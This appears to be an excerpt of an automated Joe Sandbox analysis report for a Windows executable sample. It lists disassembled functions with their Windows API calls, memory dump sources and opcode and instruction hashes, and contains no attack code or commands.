                                                        • Part of subcall function 00F8DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F8CF22,?), ref: 00F8DDFD
                                                        • Part of subcall function 00F8DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F8CF22,?), ref: 00F8DE16
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00F8CF45
                                                      • MoveFileW.KERNEL32(?,?), ref: 00F8CF7F
                                                      • _wcslen.LIBCMT ref: 00F8D005
                                                      • _wcslen.LIBCMT ref: 00F8D01B
                                                      • SHFileOperationW.SHELL32(?), ref: 00F8D061
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 3164238972-1173974218
                                                      • Opcode ID: 6afa6ac06454cd31081c1f95103a85a0989f17ad780ced53d60ef94b6bcbcb32
                                                      • Instruction ID: 172abd0dc40ca25d2b4bcf363c13a8e2e0436903ce51d68758392a613b6135e6
                                                      • Opcode Fuzzy Hash: 6afa6ac06454cd31081c1f95103a85a0989f17ad780ced53d60ef94b6bcbcb32
                                                      • Instruction Fuzzy Hash: B5413471D452185FDF12FBA4DD85ADEB7B9AF08380F1000E6E605EB141EB74A644EF60
                                                      Function 00FB2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FB2E1C
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00FB2E4F
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00FB2E84
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00FB2EB6
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00FB2EE0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00FB2EF1
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FB2F0B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: 124b093b91a7d91774c7b56aae30b1b2b7362bb465a2582d541e3b518610cd75
                                                      • Instruction ID: f54136e87330ea5cc7d2375e25559f416a83060e7f28fb1b8ba283450dbbeb54
                                                      • Opcode Fuzzy Hash: 124b093b91a7d91774c7b56aae30b1b2b7362bb465a2582d541e3b518610cd75
                                                      • Instruction Fuzzy Hash: 9B31F231A04258AFEB618F5ADC84FA537E5FB9A720F150164F9048B2B1CBB1E840EF91
                                                      Function 00F87726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F87769
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F8778F
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00F87792
                                                      • SysAllocString.OLEAUT32(?), ref: 00F877B0
                                                      • SysFreeString.OLEAUT32(?), ref: 00F877B9
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00F877DE
                                                      • SysAllocString.OLEAUT32(?), ref: 00F877EC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: 5f7df3d8a2ac67dc13ac47b0c98f458184ddf5f722aad0d317daff39ca84d334
                                                      • Instruction ID: f480d4157834e9da784ecb3a5c0461356b73c50e6ad738049c4bba7c99c607ea
                                                      • Opcode Fuzzy Hash: 5f7df3d8a2ac67dc13ac47b0c98f458184ddf5f722aad0d317daff39ca84d334
                                                      • Instruction Fuzzy Hash: 2F21A176A04219AFDB10FFA8CC88EFF73ACEB09764B148125B904DB150D670DD41EBA0
                                                      Function 00F877FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F87842
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F87868
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00F8786B
                                                      • SysAllocString.OLEAUT32 ref: 00F8788C
                                                      • SysFreeString.OLEAUT32 ref: 00F87895
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00F878AF
                                                      • SysAllocString.OLEAUT32(?), ref: 00F878BD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: 7a1489207a2404e5de57fdccdbaa601260276028e248fcbb7d6ad5f96e0560dd
                                                      • Instruction ID: 04947de49b038f5631b2700e1528059c4c79970a40ccba1c8f67755ac4132834
                                                      • Opcode Fuzzy Hash: 7a1489207a2404e5de57fdccdbaa601260276028e248fcbb7d6ad5f96e0560dd
                                                      • Instruction Fuzzy Hash: 53216731A08208AFDB10FFA8DC88EAB77ACEB097607208125F515CB1A1D774DD41DB74
                                                      Function 00F904D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00F904F2
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F9052E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateHandlePipe
                                                      • String ID: nul
                                                      • API String ID: 1424370930-2873401336
                                                      • Opcode ID: 0c73614693c6b08e32e33effbb04c85262042ce9e0a2aed06d85fd767ce84cfc
                                                      • Instruction ID: a5e1b92b72eaf6e9f94b8b33a24b5d772df92cbeff99098e96275d47eda33c72
                                                      • Opcode Fuzzy Hash: 0c73614693c6b08e32e33effbb04c85262042ce9e0a2aed06d85fd767ce84cfc
                                                      • Instruction Fuzzy Hash: D1218075900309AFEF209F29DC44A9A77B8AF44734F644A29F9A1D62E0DB70D940EF60
                                                      Function 00F905A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00F905C6
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F90601
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CreateHandlePipe
                                                      • String ID: nul
                                                      • API String ID: 1424370930-2873401336
                                                      • Opcode ID: 045c5dae1ee8e33877c3ff6b22d82c152ba4e6120ff4b0746d5fd2f13832ad22
                                                      • Instruction ID: 30d72d801bf379693e195751a661ca449497f8d2a01b861aa69adefae9aeebb1
                                                      • Opcode Fuzzy Hash: 045c5dae1ee8e33877c3ff6b22d82c152ba4e6120ff4b0746d5fd2f13832ad22
                                                      • Instruction Fuzzy Hash: 482131759003059FEF209F699C44A9A77E8AF95734F200B19F8A1E72E0DB709960EF60
                                                      Function 00FB40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F2600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F2604C
                                                        • Part of subcall function 00F2600E: GetStockObject.GDI32(00000011), ref: 00F26060
                                                        • Part of subcall function 00F2600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F2606A
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00FB4112
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00FB411F
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00FB412A
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00FB4139
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00FB4145
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: 4911d29f08ec2838384401730cdfcc7990eb566ce27d41d8da47e75b8fe8bf51
                                                      • Instruction ID: 9d453a57bd2c26d88f725e088275821458323eb543da1f52bec630a9324ec6b7
                                                      • Opcode Fuzzy Hash: 4911d29f08ec2838384401730cdfcc7990eb566ce27d41d8da47e75b8fe8bf51
                                                      • Instruction Fuzzy Hash: CE11B2B255021DBEEF119F65CC85EE77F5DEF087A8F004111BA18A20A0C676DC21EBA4
                                                      Function 00F5D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F5D7A3: _free.LIBCMT ref: 00F5D7CC
                                                      • _free.LIBCMT ref: 00F5D82D
                                                        • Part of subcall function 00F529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000), ref: 00F529DE
                                                        • Part of subcall function 00F529C8: GetLastError.KERNEL32(00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000,00000000), ref: 00F529F0
                                                      • _free.LIBCMT ref: 00F5D838
                                                      • _free.LIBCMT ref: 00F5D843
                                                      • _free.LIBCMT ref: 00F5D897
                                                      • _free.LIBCMT ref: 00F5D8A2
                                                      • _free.LIBCMT ref: 00F5D8AD
                                                      • _free.LIBCMT ref: 00F5D8B8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                                      • Instruction ID: c1c9034bcaec64ba6238a0d632596cb3498d724c264ee73809417d0f198d4aa7
                                                      • Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                                      • Instruction Fuzzy Hash: 9C118171542B04AAD531BFB0DC07FCB7BECAF09702F400825BB99A6992DA28B5097650
                                                      Function 00F8DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F8DA74
                                                      • LoadStringW.USER32(00000000), ref: 00F8DA7B
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F8DA91
                                                      • LoadStringW.USER32(00000000), ref: 00F8DA98
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F8DADC
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00F8DAB9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 4072794657-3128320259
                                                      • Opcode ID: 4e00f4c6602f6ff4c8826a5f0595324281977062d23405590e644eb420286dce
                                                      • Instruction ID: 439d7e4ca888c51730912e9d41b65488c636c56e6304183acbd5a6d87b94380f
                                                      • Opcode Fuzzy Hash: 4e00f4c6602f6ff4c8826a5f0595324281977062d23405590e644eb420286dce
                                                      • Instruction Fuzzy Hash: 260162F690020C7FE711ABA49DC9EE7376CEB08701F401591B706E2082EA749E845FB4
                                                      Function 00F9096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(011FE858,011FE858), ref: 00F9097B
                                                      • EnterCriticalSection.KERNEL32(011FE838,00000000), ref: 00F9098D
                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00F9099B
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00F909A9
                                                      • CloseHandle.KERNEL32(00000000), ref: 00F909B8
                                                      • InterlockedExchange.KERNEL32(011FE858,000001F6), ref: 00F909C8
                                                      • LeaveCriticalSection.KERNEL32(011FE838), ref: 00F909CF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: cfaab036af863e3ff759a9b94b10c8b4bfdbf64206c275773e2bf2c1fc9bc14c
                                                      • Instruction ID: 7ab3afad73587a50980d3b7a43983058e685f1d82323e4e2625fa03261f088c9
                                                      • Opcode Fuzzy Hash: cfaab036af863e3ff759a9b94b10c8b4bfdbf64206c275773e2bf2c1fc9bc14c
                                                      • Instruction Fuzzy Hash: 12F01D31442516BBEB455F94EEC8AD77A35BF01712F401126F101508A0CB749865EFD0
                                                      Function 00FA1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00FA1DC0
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00FA1DE1
                                                      • WSAGetLastError.WSOCK32 ref: 00FA1DF2
                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00FA1EDB
                                                      • inet_ntoa.WSOCK32(?), ref: 00FA1E8C
                                                        • Part of subcall function 00F839E8: _strlen.LIBCMT ref: 00F839F2
                                                        • Part of subcall function 00FA3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00F9EC0C), ref: 00FA3240
                                                      • _strlen.LIBCMT ref: 00FA1F35
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3203458085-0
                                                      • Opcode ID: 00a81ebc422b7d3d8f977bb61f1ffe91bc03f9ba2248ba4340cc16c55a5b71a2
                                                      • Instruction ID: c6db0c4b0181e0dc0c029f744f350106a2dacea82352046a52da274fd2a5b1b9
                                                      • Opcode Fuzzy Hash: 00a81ebc422b7d3d8f977bb61f1ffe91bc03f9ba2248ba4340cc16c55a5b71a2
                                                      • Instruction Fuzzy Hash: B8B1EEB1604340AFC324DF24C885E2A7BA5BF86328F59894CF4565F2E2CB75ED42DB91
                                                      Function 00F501B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __allrem.LIBCMT ref: 00F500BA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F500D6
                                                      • __allrem.LIBCMT ref: 00F500ED
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F5010B
                                                      • __allrem.LIBCMT ref: 00F50122
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F50140
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 1992179935-0
                                                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                      • Instruction ID: 922e66ca6cca66997b7de849cab636d4a02fdc4fa1ca39585706ac666ac2c7f7
                                                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                      • Instruction Fuzzy Hash: 31810872A00B069BE7209F28CC41B6B77E8AF41335F24423AFE55D66C1EB74D908A791
                                                      Function 00F561FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F482D9,00F482D9,?,?,?,00F5644F,00000001,00000001,8BE85006), ref: 00F56258
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F5644F,00000001,00000001,8BE85006,?,?,?), ref: 00F562DE
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F563D8
                                                      • __freea.LIBCMT ref: 00F563E5
                                                        • Part of subcall function 00F53820: RtlAllocateHeap.NTDLL(00000000,?,00FF1444,?,00F3FDF5,?,?,00F2A976,00000010,00FF1440,00F213FC,?,00F213C6,?,00F21129), ref: 00F53852
                                                      • __freea.LIBCMT ref: 00F563EE
                                                      • __freea.LIBCMT ref: 00F56413
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      • Opcode ID: d14bc59d9aa301663996e5ce39c548373be00b67312eb692824f584ad5e93384
                                                      • Instruction ID: b36ee0ae88990c3799f2a9c35e83a3360154bd4d97bfda616bb4ae0b2594d6ed
                                                      • Opcode Fuzzy Hash: d14bc59d9aa301663996e5ce39c548373be00b67312eb692824f584ad5e93384
                                                      • Instruction Fuzzy Hash: EC51E672A00216ABDF258F64CC81FAF77A9EF44761F544629FE25D7240DB34DC48E6A0
                                                      Function 00FABBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                        • Part of subcall function 00FAC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FAB6AE,?,?), ref: 00FAC9B5
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FAC9F1
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FACA68
                                                        • Part of subcall function 00FAC998: _wcslen.LIBCMT ref: 00FACA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FABCCA
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FABD25
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FABD6A
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00FABD99
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00FABDF3
                                                      • RegCloseKey.ADVAPI32(?), ref: 00FABDFF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
